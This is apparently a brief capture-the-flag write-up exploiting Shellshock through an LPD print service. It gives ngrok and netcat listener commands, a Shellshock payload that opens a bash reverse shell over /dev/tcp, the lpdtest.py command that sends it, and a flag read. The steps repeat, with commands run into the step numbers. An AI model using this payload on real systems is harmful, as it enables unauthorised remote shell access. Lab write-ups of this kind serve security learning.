Preparation
We’ll try to get a reverse shell so we need to:
1. Open a port so that the target can reach you
2. Listen on this port
Attack
Searching for shell shoker you can find this
1. Crafting the payload
2. Send the payload using this tool
3. You get a reverse shell, now read the flag
We’ll try to get a reverse shell so we need to:
1. Open a port so that the target can reach you
ngrok tcp 90022. Listen on this port
nc -lvnp 9002Attack
Searching for shell shoker you can find this
1. Crafting the payload
() { :; }; echo ; /bin/bash -c 'bash -i >& /dev/tcp/ngrokHost/ngrokPort 0>&1' 2. Send the payload using this tool
python3 lpdtest.py --port targetPort targetHost in '() { :; }; echo ; /bin/bash -c "bash -i >& /dev/tcp/ngrokHost/ngrokPort 0>&1"'3. You get a reverse shell, now read the flag
cat /opt/flag.txt/ 
